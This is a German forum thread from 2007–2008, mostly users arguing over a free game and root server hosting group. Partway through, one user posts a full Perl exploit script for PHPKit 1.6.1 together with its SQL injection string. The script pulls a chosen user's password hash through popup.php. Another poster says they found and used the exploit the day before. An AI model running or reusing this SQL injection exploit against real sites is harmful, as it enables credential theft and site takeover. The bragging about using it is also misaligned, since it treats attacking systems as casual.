|
|
|
|
|
|
[G:C]Gullianer Clan
Registrierungsdatum: Jul 2005
|
Re: gratis Root/Game/TS/... Server sind in den Startlöchern?!
So wie er es beschrieben hat, bekommen sie ungenutzte Server geschenkt. Somit sind sie nicht die Eigentümer / Besitzer der Server und brauchen wiederum keine Lizenzen, weil der Besitzer (der den gemietet hat) dafür verantwortlich ist.
|
17. 10. 2007, 21:23
|
|
|
Mitglied
Registrierungsdatum: Feb 2007
|
Zitat:
|
Zitat von buggerman
So wie er es beschrieben hat, bekommen sie ungenutzte Server geschenkt. Somit sind sie nicht die Eigentümer / Besitzer der Server und brauchen wiederum keine Lizenzen, weil der Besitzer (der den gemietet hat) dafür verantwortlich ist.
|
Stimmt nicht ganz aber naja!
Wir haben schon eine NPO!
Aber whayne?!
Jemand bisher unzufrieden mit uns?
|
17. 10. 2007, 23:32
|
|
|
Mitglied
Registrierungsdatum: Sep 2005
|
Schade das ich diesen Beitrag erst jetzt gesehen habe - ich kenne die Admins seit längerem...
Einige Zeit hatte ich (da war es noch ein einziger Server) den Administrativen Bereich übernommen und mit erschrecken festgestellt, das komplett alle Dienste auf diesem Server als Root liefen - egal ob TeamSpeak oder andere Dinge.
Die jahrelange Erfahrung ist also praktisch vorgetäuscht. Ahnung habe ich zwar keine wo die die ganzen Root-Server her haben, aber taugen tu'n Sie auf alle Fälle nicht viel - der Hauptserver steht bei FastIT aka. Webtropia und ist bei zu viel Traffic bis aufs äußerste gedrosselt.
Ich bin der Meinung lieber 2 Euro im Monat zu zahlen - dafür guten Service und Webspace zu bekommen. Hetzner sei dank
Greetz, Liquid-Silk
//Edit:
Zitat:
Erstmal sind wir keine Kiddies und haben im Hosting geschäft erfahrung!
|
Ich stelle fest die Welt ist klein. Du hattest vor nem halben Jahr noch nich mal Ahnung davon wie man nen vernünftigen Gameserver aufsetzt... Andauernd formatierst du "deine" Roots und beschwerst dich beim Support "Ey, da sind Flooding-Attacken auf meinen TS"
....
Wahrscheinlich nutzt Ihr nun noch mein Anti-Flood Script - Werdet glücklich bei Webtropia. ROFL
|
02. 11. 2007, 13:30
|
|
|
Stinkstiefel
Registrierungsdatum: Jun 2000
|
Zitat:
|
Zitat von Pura-Vida
Aber zum Server Standort: einige Düsseldorf andere Frankfurt! 100 MB anbindung!
Und die aus düsseldorf haben eine 1GB anbindung nach Frankfurt!
|
Bei dem Müll den du quatscht, wunderts mich, dass du sowas überhaupt anbietest.
Du hast 0 Ahnung.
|
03. 11. 2007, 01:53
|
|
|
Mitglied
Registrierungsdatum: Nov 2007
|
Hallo zusammen!
,jetzt melde ich mich auch mal zu Wort, da ich mit PuraVida diesen Service betreibe.
Ich finde, das unser Hosting, durch diesen Thread ziemlich in den Dreck gezogen wird.Allein schon durch solch unqualifizierte Kommentare wie diesen:
Zitat:
Schade das ich diesen Beitrag erst jetzt gesehen habe - ich kenne die Admins seit längerem...
Einige Zeit hatte ich (da war es noch ein einziger Server) den Administrativen Bereich übernommen und mit erschrecken festgestellt, das komplett alle Dienste auf diesem Server als Root liefen - egal ob TeamSpeak oder andere Dinge.
|
Aja.... du kennst uns? Wer kennt uns nicht ?
Du unsere Server verwaltet? Ich denke er weniger, das du jemals Zugriff auf die Roots Server von Xtream-Webhost.com hattest.
Hmm.... alle Dienste über den Benutzer root ausgeführt?
Eher weniger, aber egal.
Zitat:
|
Die jahrelange Erfahrung ist also praktisch vorgetäuscht. Ahnung habe ich zwar keine wo die die ganzen Root-Server her haben, aber taugen tu'n Sie auf alle Fälle nicht viel - der Hauptserver steht bei FastIT aka. Webtropia und ist bei zu viel Traffic bis aufs äußerste gedrosselt.
|
1. Wir haben Jahrelange Erfahrung, im Hostingbereich, ob Gewerblich oder 4Free, dies zeichnet uns aus. ( Aktiv z.B. bei rootingking, server-arena, gs4you, utn-hosting, speed-hoster etc. ....)
2.Wo wir die Roots her haben, tut nichts zur Sache.
3.Finde ich es scheiße von dir, über FastIT zu lästern.
4.Würden unsere Server nicht taugen, wären sie, so ein taugenutz wie du.
Zitat:
|
Ich bin der Meinung lieber 2 Euro im Monat zu zahlen - dafür guten Service und Webspace zu bekommen. Hetzner sei dank
|
Da sieht man, wie du dich in der Branche auskennst.Hetzner und ihr Webspace, da sag ich jetzt mal nicht zu  .
Greetz, Liquid-Silk
Zitat:
//Edit:
Zitat:
Erstmal sind wir keine Kiddies und haben im Hosting geschäft erfahrung!
Ich stelle fest die Welt ist klein. Du hattest vor nem halben Jahr noch nich mal Ahnung davon wie man nen vernünftigen Gameserver aufsetzt... Andauernd formatierst du "deine" Roots und beschwerst dich beim Support "Ey, da sind Flooding-Attacken auf meinen TS"
....
|
Mal eine Frage verwechselst du uns mit unserem Freund Felix Hauk(cyberfox)?
Ich denke er weniger, das Pura vor einem halben Jahr nicht wusste, wie man einen Gameserver installiert.
und zu den Floodingsachen und den neuinstallationen kann ich nur .
Wahrscheinlich nutzt Ihr nun noch mein Anti-Flood Script - Werdet glücklich bei Webtropia. ROFL<
Zum Schluss lass mich mal raten wer du bist.
Trogby  , oder etwa Cyberfoxi^^
Mfg
wiki
|
06. 11. 2007, 22:12
|
|
|
Mitglied
Registrierungsdatum: Feb 2007
|
Zitat:
|
Zitat von Liquid-Silk
Greetz, Liquid-Silk
//Edit:
....
Wahrscheinlich nutzt Ihr nun noch mein Anti-Flood Script - Werdet glücklich bei Webtropia. ROFL
|
-"Einige Zeit hatte ich (da war es noch ein einziger Server) den Administrativen Bereich übernommen" Ämm! Als alles anfing da waren es schon mehr als 1 Server. Und ich denke, dass ich selbst WENN ich mal nicht wuste wie etwas ging, habe ich den "Administrativenbereich" aufkeinenfall weitergegeben, da ich 1. zu ängstlich bin und mir 2. lieber MILLIONEN Tuts angeschaut hätte um was zu lernen.
-"mit erschrecken festgestellt, das komplett alle Dienste auf diesem Server als Root liefen" Gameserver laufen unter den von Teklab angelegten Benutzern!
-Teamspeak hat für jede instanz ein eigenen Benutzer!
-Zu dem mit dem Gameserver: hlupdatetool?
Vll verwechselst du hier etwas, da einer der RootServer von mir verwalltet wird, allerdings habe ich mit der vorgeschichte nichts am Hut. Ich weiß nur das der Besitzer Empört über den damaligen Verwallter (das währst dann ja du) gewehsen ist, da er den Server nur für sich beansprucht hat (Streams instaliert, ...).
mfG Knuti
€dit: Uns gibt es nichtmal 1 Monat!
|
06. 11. 2007, 22:43
|
|
|
|
http://youtube.com/watch?v=4K7AQc2TOxs
Räusper !!!
Falls du das nicht bist dann melde dich aber das find ich doch ein bisschen niveau los
als WebAdmin!
|
07. 11. 2007, 20:09
|
|
|
[G:C]Gullianer Clan
Registrierungsdatum: Jul 2005
|
Irgendwie krass wie schnell man sowas ausschalten kann. Gab es da eine Sicherheitslücke oder ähnliches die eingestellt war? Ich kann mir schlecht vorstellen das es mit den ganzen phpkits gehen soll. (die Version)
sry 4 Offtopic ist aber ein Interessantes Thema!
|
07. 11. 2007, 20:34
|
|
|
|
das geht ganz einfach,bei jedem Phpkit 1.6.1 das pub exploit geht nicht immer
aber das non pub geht immer
|
07. 11. 2007, 21:27
|
|
|
Mitglied
|
gibt aber genug Möglichkeiten sich dagegen zu schützen... angefangen beim htaccess schutz für den Adminbereich ^^
|
07. 11. 2007, 22:19
|
|
|
Mitglied
|
Das Tutorial ist von mir, allerdings wurde es von mir nicht bei youtube gepostet.Auserdem tut das nichts zur Sache  .
Zur Sicherheitslücke:
Zitat:
#!/usr/bin/perl
use IO::Socket;
print q{
-----------------------------------------------
PHPKit 1.6.1 exploit by x23 ~ phcn.ws ~ geek-network.de
use: phpkit161.pl [server] [dir] [vic_id]
sample:
$ perl phpkit161.pl localhost /phpkit/ 1
-----------------------------------------------
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
$vic_id = $ARGV[2];
if (!$vic_id) { die "~ read how to use \n"; }
print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
print "~ exploiting\n";
print $sock "POST ".$directory."popup.php?path=misc/finduser.php HTTP/1.1\r\n";
print $sock "Host: $webpage\r\n";
print $sock "Keep-Alive: 300\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length("search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+W HERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1")."\r\n\r\n";
print $sock "search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user _id%3D".$vic_id."%2F*&action=Suche&User=-1";
while ($answer = <$sock>) {
#print $answer;
if ($answer =~/<option value="([0-9a-f]{32})">/) {
print "~ hash: $1\n";
close($sock);
exit();
break;
}
}
close($sock);
# milw0rm.com [2006-11-04]
|
popup.php?path=misc/finduser.php
Sql injection: search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_ id%3D".$vic_id."%2F*&action=Suche&User=-1
Das sollte, alles sagen  .
Mfg
wiki
|
08. 11. 2007, 22:04
|
|
|
Delikatesse :-)
Registrierungsdatum: Apr 2006
|
Funktioniert bei der Version 1.6.03 - 1.6.1 und bei einer anderen Version auch noch - gestern den Exploit gefunden und angewendet
Werde mal die PhpKit admins davon unterrichten
|
09. 11. 2007, 12:36
|
|
|
Mitglied
|
Hallo!
,da unser Domain Hoster, momentan ein Problem hat, sind wir unter folgenden Domains momentan nicht erreichbar:
www.xtream-webhost.de
www.xtream-webhost.com
Bitte erreichen sie uns unter www.fastwebhost.de
PS: Keine Bestellungen können bearbeitet werden, da alle mit den oben gennanten Links verknüpft sind.
Ich bitte um Verständnis.
Mfg
wiki123
|
10. 11. 2007, 12:13
|
|
|
<3 the new design
Registrierungsdatum: Dec 2005
|
eure server sind leider mal wieder off :/
|
15. 11. 2007, 21:44
|
|
|
Mitglied
Registrierungsdatum: Mar 2008
|
Zitat:
|
Zitat von Wrigleys
eure server sind leider mal wieder off :/
|
... und werden wohl, so wie ich das als ex-freiwilliger-mitarbeiter sehe, nicht mehr on kommen.
|
22. 03. 2008, 18:23
|
|
|
Alle Zeitangaben in UTC +1. Es ist jetzt 22:11 Uhr.
|
|